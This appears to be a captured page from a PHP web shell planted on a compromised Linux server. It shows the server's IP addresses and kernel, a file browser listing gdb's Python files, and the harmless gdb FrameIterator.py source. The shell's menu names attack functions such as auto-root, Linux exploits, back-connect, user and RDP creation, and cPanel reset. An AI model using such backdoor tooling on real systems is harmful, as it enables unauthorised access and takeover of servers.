Linux server.nvwebsoft.co.in 3.10.0-1160.114.2.el7.x86_64 #1 SMP Wed Mar 20 15:54:52 UTC 2024 x86_64
Apache
: 162.240.12.249 | : 18.226.248.17
202 Domain
8.1.31
nbspublicschool
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
gdb /
python /
gdb /
[ HOME SHELL ]
Name
Size
Permission
Action
command
[ DIR ]
drwxr-xr-x
function
[ DIR ]
drwxr-xr-x
FrameDecorator.py
9.85
KB
-rw-r--r--
FrameDecorator.pyc
8.25
KB
-rw-r--r--
FrameDecorator.pyo
8.25
KB
-rw-r--r--
FrameIterator.py
1.34
KB
-rw-r--r--
FrameIterator.pyc
1.26
KB
-rw-r--r--
FrameIterator.pyo
1.26
KB
-rw-r--r--
__init__.py
3.37
KB
-rw-r--r--
__init__.pyc
3.38
KB
-rw-r--r--
__init__.pyo
3.38
KB
-rw-r--r--
frames.py
7.79
KB
-rw-r--r--
frames.pyc
6.01
KB
-rw-r--r--
frames.pyo
6.01
KB
-rw-r--r--
printing.py
9.95
KB
-rw-r--r--
printing.pyc
9.2
KB
-rw-r--r--
printing.pyo
9.2
KB
-rw-r--r--
prompt.py
4.11
KB
-rw-r--r--
prompt.pyc
4.31
KB
-rw-r--r--
prompt.pyo
4.31
KB
-rw-r--r--
types.py
5.29
KB
-rw-r--r--
types.pyc
5.37
KB
-rw-r--r--
types.pyo
5.37
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : FrameIterator.py
# Copyright (C) 2013 Free Software Foundation, Inc. # This program is free software; you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation; either version 3 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program. If not, see <http://www.gnu.org/licenses/>. import gdb import itertools class FrameIterator(object): """A gdb.Frame iterator. Iterates over gdb.Frames or objects that conform to that interface.""" def __init__(self, frame_obj): """Initialize a FrameIterator. Arguments: frame_obj the starting frame.""" super(FrameIterator, self).__init__() self.frame = frame_obj def __iter__(self): return self def next(self): """next implementation. Returns: The next oldest frame.""" result = self.frame if result is None: raise StopIteration self.frame = result.older() return result
Close